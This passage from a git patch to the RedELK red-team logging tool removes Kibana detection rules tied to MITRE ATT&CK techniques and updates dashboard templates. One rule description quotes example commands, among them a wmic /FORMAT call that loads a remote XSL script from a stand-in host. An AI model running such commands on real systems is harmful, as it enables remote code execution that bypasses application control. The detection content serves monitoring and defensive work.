ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1078","name":"Valid Accounts","id":"T1078"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1078","name":"Valid Accounts","id":"T1078"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1078","name":"Valid Accounts","id":"T1078"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1078","name":"Valid Accounts","id":"T1078"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from Screen Capture due to use of specific devices or applications for video recording rather than capturing the victim's screen.\nIn macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. [1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1125","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1125] Video Capture","query":"threat.technique.id: T1125","references":["https://attack.mitre.org/techniques/T1125"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1125","name":"Video Capture","id":"T1125"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.\nAdversaries may use several methods to accomplish Virtualization/Sandbox Evasion such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1497","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1497] Virtualization/Sandbox Evasion","query":"threat.technique.id: T1497","references":["https://attack.mitre.org/techniques/T1497"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1497","name":"Virtualization/Sandbox Evasion","id":"T1497"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1497","name":"Virtualization/Sandbox Evasion","id":"T1497"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1102","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1102] Web Service","query":"threat.technique.id: T1102","references":["https://attack.mitre.org/techniques/T1102"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1102","name":"Web Service","id":"T1102"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1102","name":"Web Service","id":"T1102"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.[1]\nAuthentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through Steal Web Session Cookie, the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.\nThere have been examples of malware targeting session cookies to bypass multi-factor authentication systems.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1506","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1506] Web Session Cookie","query":"threat.technique.id: T1506","references":["https://attack.mitre.org/techniques/T1506","https://attack.mitre.org/techniques/T1550/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1506","name":"Web Session Cookie","id":"T1506"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1506","name":"Web Session Cookie","id":"T1506"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.\nIn addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: China Chopper Web shell client).[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1100","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1100] Web Shell","query":"threat.technique.id: T1100","references":["https://attack.mitre.org/techniques/T1100","https://attack.mitre.org/techniques/T1505/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1100","name":"Web Shell","id":"T1100"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1100","name":"Web Shell","id":"T1100"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) [1] and Remote Procedure Call Service (RPCS) [2] for remote access. RPCS operates over port 135. [3]\nAn adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. [4] [5]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1047","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1047] Windows Management Instrumentation","query":"threat.technique.id: T1047","references":["https://attack.mitre.org/techniques/T1047"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1047","name":"Windows Management Instrumentation","id":"T1047"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use Valid Accounts to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.\nSMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.\nWindows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over SMB,[1] to interact with systems using remote procedure calls (RPCs),[2] transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task/Job, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels.[3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1077","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1077] Windows Admin Shares","query":"threat.technique.id: T1077","references":["https://attack.mitre.org/techniques/T1077","https://attack.mitre.org/techniques/T1021/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1077","name":"Windows Admin Shares","id":"T1077"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. [1]\nAdversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. [2] [3] Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. [4] [5]\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1084","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1084] Windows Management Instrumentation Event Subscription","query":"threat.technique.id: T1084","references":["https://attack.mitre.org/techniques/T1084","https://attack.mitre.org/techniques/T1546/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1084","name":"Windows Management Instrumentation Event Subscription","id":"T1084"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\nWinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).[1] It may be called with the winrm command or by any number of programs such as PowerShell.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1028","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1028] Windows Remote Management","query":"threat.technique.id: T1028","references":["https://attack.mitre.org/techniques/T1028","https://attack.mitre.org/techniques/T1021/006"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1028","name":"Windows Remote Management","id":"T1028"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1028","name":"Windows Remote Management","id":"T1028"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. [1]\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to Trusted Developer Utilities Proxy Execution, the Microsoft common line transformation utility binary (msxsl.exe) [2] can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. [3] Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. [4] Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.[5]\nCommand-line examples:[3][5]\nmsxsl.exe customers[.]xml script[.]xsl\nmsxsl.exe script[.]xsl script[.]xsl\nmsxsl.exe script[.]jpeg script[.]jpeg\nAnother variation of this technique, dubbed \"Squiblytwo\", involves using Windows Management Instrumentation to invoke JScript or VBScript within an XSL file.[6] This technique can also execute local/remote scripts and, similar to its Regsvr32/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in Windows Management Instrumentation provided they utilize the /FORMAT switch.[5]\nCommand-line examples:[5][6]\nLocal File: wmic process list /FORMAT:evil[.]xsl\nRemote File: wmic os get /FORMAT:\"https[:]//example[.]com/evil[.]xsl\"","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1220","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1220] XSL Script Processing","query":"threat.technique.id: T1220","references":["https://attack.mitre.org/techniques/T1220"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1220","name":"XSL Script Processing","id":"T1220"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1220","name":"XSL Script Processing","id":"T1220"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\Wow6432Node\\]\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon. [1]\nMalicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: [1]\nWinlogon\\Notify - points to notification package DLLs that handle Winlogon events\nWinlogon\\Userinit - points to userinit.exe, the user initialization program executed when a user logs on\nWinlogon\\Shell - points to explorer.exe, the system shell executed when a user logs on\nAdversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1004","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1004] Winlogon Helper DLL","query":"threat.technique.id: T1004","references":["https://attack.mitre.org/techniques/T1004","https://attack.mitre.org/techniques/T1547/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1004","name":"Winlogon Helper DLL","id":"T1004"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} From 22fdc4cb3db957461c6a0d864576378492db63ce Mon Sep 17 00:00:00 2001 From: Marc Smeets Date: Sat, 19 Feb 2022 14:46:40 +0100 Subject: [PATCH 16/18] Bog update on ES and Kibana templates --- .../diff/redelk_kibana_dashboard.json | 163 ++--- ...lk_kibana_index-pattern_.siem-signals.json | 6 +- ...redelk_kibana_index-pattern_bluecheck.json | 613 +----------------- ...delk_kibana_index-pattern_credentials.json | 6 +- .../redelk_kibana_index-pattern_email.json | 6 +- ...edelk_kibana_index-pattern_implantsdb.json | 6 +- .../redelk_kibana_index-pattern_redelk.json | 6 +- ...elk_kibana_index-pattern_redirtraffic.json | 6 +- .../redelk_kibana_index-pattern_rtops.json | 6 +- .../templates/diff/redelk_kibana_search.json | 96 +-- .../diff/redelk_kibana_visualization.json | 282 ++++---- ...delk_elasticsearch_template_bluecheck.json | 45 +- ...k_elasticsearch_template_redirtraffic.json | 24 + .../templates/redelk_kibana_dashboard.ndjson | 24 +- ..._kibana_index-pattern_.siem-signals.ndjson | 2 +- ...delk_kibana_index-pattern_bluecheck.ndjson | 2 +- ...lk_kibana_index-pattern_credentials.ndjson | 2 +- .../redelk_kibana_index-pattern_email.ndjson | 2 +- ...elk_kibana_index-pattern_implantsdb.ndjson | 2 +- ..._kibana_index-pattern_redelk-iplist.ndjson | 2 +- .../redelk_kibana_index-pattern_redelk.ndjson | 2 +- ...k_kibana_index-pattern_redirtraffic.ndjson | 2 +- .../redelk_kibana_index-pattern_rtops.ndjson | 2 +- .../templates/redelk_kibana_search.ndjson | 32 +- .../redelk_kibana_visualization.ndjson | 94 +-- 25 files changed, 454 insertions(+), 979 deletions(-) diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_dashboard.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_dashboard.json index 60590cb9..27348d65 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_dashboard.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_dashboard.json @@ -221,7 +221,7 @@ "title": "RedELK - Summary dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "02486040-d355-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -289,8 +289,8 @@ } ], "sort": [ - 1642152857910, - 2054 + 1642171876916, + 34 ], "type": "dashboard", "version": "1" @@ -401,7 +401,7 @@ "title": "RedELK - Red Team Operations", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "04b87c50-d028-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -434,8 +434,8 @@ } ], "sort": [ - 1642152857910, - 2060 + 1642171876916, + 40 ], "type": "dashboard", "version": "1" @@ -547,7 +547,7 @@ "title": "RedELK - Tasks", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "0523c8a0-d025-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -580,8 +580,8 @@ } ], "sort": [ - 1642152857910, - 2066 + 1642171876916, + 46 ], "type": "dashboard", "version": "1" @@ -653,7 +653,7 @@ "enhancements": {} }, "gridData": { - "h": 2, + "h": 4, "i": "948c1286-d4de-44a6-8fb2-95bf9252ed00", "w": 48, "x": 0, @@ -662,7 +662,7 @@ "panelIndex": "948c1286-d4de-44a6-8fb2-95bf9252ed00", "panelRefName": "panel_948c1286-d4de-44a6-8fb2-95bf9252ed00", "type": "visualization", - "version": "7.10.0" + "version": "7.16.3" }, { "embeddableConfig": { @@ -674,31 +674,34 @@ "i": "ab9eb0fb-a164-4295-8177-865a2a67dccb", "w": 36, "x": 0, - "y": 2 + "y": 4 }, "panelIndex": "ab9eb0fb-a164-4295-8177-865a2a67dccb", "panelRefName": "panel_ab9eb0fb-a164-4295-8177-865a2a67dccb", "title": "Filters", "type": "visualization", - "version": "7.10.0" + "version": "7.16.3" }, { "embeddableConfig": { "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "vis": { + "legendOpen": true + } }, "gridData": { "h": 5, "i": "c630a33e-6a98-466d-8223-fd83e6947b8c", "w": 12, "x": 36, - "y": 2 + "y": 4 }, "panelIndex": "c630a33e-6a98-466d-8223-fd83e6947b8c", "panelRefName": "panel_c630a33e-6a98-466d-8223-fd83e6947b8c", "title": "HTTP Redir traffic per backend", "type": "visualization", - "version": "7.10.0" + "version": "7.16.3" }, { "embeddableConfig": { @@ -718,13 +721,13 @@ "i": "1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", "w": 24, "x": 0, - "y": 7 + "y": 9 }, "panelIndex": "1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", "panelRefName": "panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", "title": "HTTP redir traffic map", "type": "map", - "version": "7.10.0" + "version": "7.16.3" }, { "embeddableConfig": { @@ -736,13 +739,13 @@ "i": "fc254327-57ac-4e5f-88f7-a32d48570289", "w": 24, "x": 24, - "y": 7 + "y": 9 }, "panelIndex": "fc254327-57ac-4e5f-88f7-a32d48570289", "panelRefName": "panel_fc254327-57ac-4e5f-88f7-a32d48570289", "title": "HTTP Redir traffic over time", "type": "visualization", - "version": "7.10.0" + "version": "7.16.3" }, { "embeddableConfig": { @@ -753,12 +756,12 @@ "i": "829f61cf-9374-4bb5-8214-34e6875e79da", "w": 24, "x": 0, - "y": 22 + "y": 24 }, "panelIndex": "829f61cf-9374-4bb5-8214-34e6875e79da", "panelRefName": "panel_829f61cf-9374-4bb5-8214-34e6875e79da", "type": "visualization", - "version": "7.10.0" + "version": "7.16.3" }, { "embeddableConfig": { @@ -769,12 +772,12 @@ "i": "0bc5f60b-f940-451a-886b-edff3512d180", "w": 48, "x": 0, - "y": 37 + "y": 39 }, "panelIndex": "0bc5f60b-f940-451a-886b-edff3512d180", "panelRefName": "panel_0bc5f60b-f940-451a-886b-edff3512d180", "type": "search", - "version": "7.10.0" + "version": "7.16.3" } ], "refreshInterval": { @@ -787,7 +790,7 @@ "title": "RedELK - Traffic dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba", "migrationVersion": { "dashboard": "7.16.0" @@ -840,8 +843,8 @@ } ], "sort": [ - 1642152857910, - 2076 + 1643016059071, + 291 ], "type": "dashboard", "version": "1" @@ -1031,7 +1034,7 @@ "title": "RedELK - Implants dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "117dbba0-c6f5-11e8-a9c6-cd307b96b1ba", "migrationVersion": { "dashboard": "7.16.0" @@ -1084,8 +1087,8 @@ } ], "sort": [ - 1642152857910, - 2086 + 1642171876916, + 56 ], "type": "dashboard", "version": "1" @@ -1211,7 +1214,7 @@ "title": "RedELK - MITRE ATT&CK", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "3ed7a630-d051-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -1249,8 +1252,8 @@ } ], "sort": [ - 1642152857910, - 2093 + 1642171876916, + 63 ], "type": "dashboard", "version": "1" @@ -1398,7 +1401,7 @@ "title": "RedELK - Health", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "509e6a80-926a-11eb-a753-9da683898c26", "migrationVersion": { "dashboard": "7.16.0" @@ -1441,8 +1444,8 @@ } ], "sort": [ - 1642152857910, - 2101 + 1642171876916, + 71 ], "type": "dashboard", "version": "1" @@ -1586,7 +1589,7 @@ "title": "RedELK - Alarms dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "53b69200-d4e3-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -1629,8 +1632,8 @@ } ], "sort": [ - 1642152857910, - 2109 + 1642171876916, + 79 ], "type": "dashboard", "version": "1" @@ -1658,7 +1661,7 @@ "enhancements": {} }, "gridData": { - "h": 2, + "h": 3, "i": "80f94a01-4e80-42c2-b67e-971bab6e0526", "w": 48, "x": 0, @@ -1667,23 +1670,7 @@ "panelIndex": "80f94a01-4e80-42c2-b67e-971bab6e0526", "panelRefName": "panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 11, - "i": "55aca97f-b1f0-43b1-af44-756fe59be5fc", - "w": 17, - "x": 31, - "y": 2 - }, - "panelIndex": "55aca97f-b1f0-43b1-af44-756fe59be5fc", - "panelRefName": "panel_55aca97f-b1f0-43b1-af44-756fe59be5fc", - "type": "visualization", - "version": "7.8.0" + "version": "7.16.3" }, { "embeddableConfig": { @@ -1694,12 +1681,12 @@ "i": "8375955c-eab4-48d9-ac8a-e4de3dd6fab2", "w": 24, "x": 0, - "y": 2 + "y": 3 }, "panelIndex": "8375955c-eab4-48d9-ac8a-e4de3dd6fab2", "panelRefName": "panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2", "type": "visualization", - "version": "7.8.0" + "version": "7.16.3" }, { "embeddableConfig": { @@ -1710,12 +1697,28 @@ "i": "1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", "w": 7, "x": 24, - "y": 2 + "y": 3 }, "panelIndex": "1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", "panelRefName": "panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", "type": "visualization", - "version": "7.8.0" + "version": "7.16.3" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "55aca97f-b1f0-43b1-af44-756fe59be5fc", + "w": 17, + "x": 31, + "y": 3 + }, + "panelIndex": "55aca97f-b1f0-43b1-af44-756fe59be5fc", + "panelRefName": "panel_55aca97f-b1f0-43b1-af44-756fe59be5fc", + "type": "visualization", + "version": "7.16.3" }, { "embeddableConfig": { @@ -1734,19 +1737,19 @@ "i": "9a987436-c698-4236-9b92-bfab81de8cc1", "w": 48, "x": 0, - "y": 13 + "y": 14 }, "panelIndex": "9a987436-c698-4236-9b92-bfab81de8cc1", "panelRefName": "panel_9a987436-c698-4236-9b92-bfab81de8cc1", "type": "search", - "version": "7.8.0" + "version": "7.16.3" } ], "timeRestore": false, "title": "RedELK - Downloads dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "643de010-d04c-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -1757,11 +1760,6 @@ "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization" }, - { - "id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", - "name": "55aca97f-b1f0-43b1-af44-756fe59be5fc:panel_55aca97f-b1f0-43b1-af44-756fe59be5fc", - "type": "visualization" - }, { "id": "85446c80-d04b-11ea-9301-a30a04251ae9", "name": "8375955c-eab4-48d9-ac8a-e4de3dd6fab2:panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2", @@ -1772,6 +1770,11 @@ "name": "1e1864e7-1cbf-41bf-a9a5-8afadce8cadf:panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", "type": "visualization" }, + { + "id": 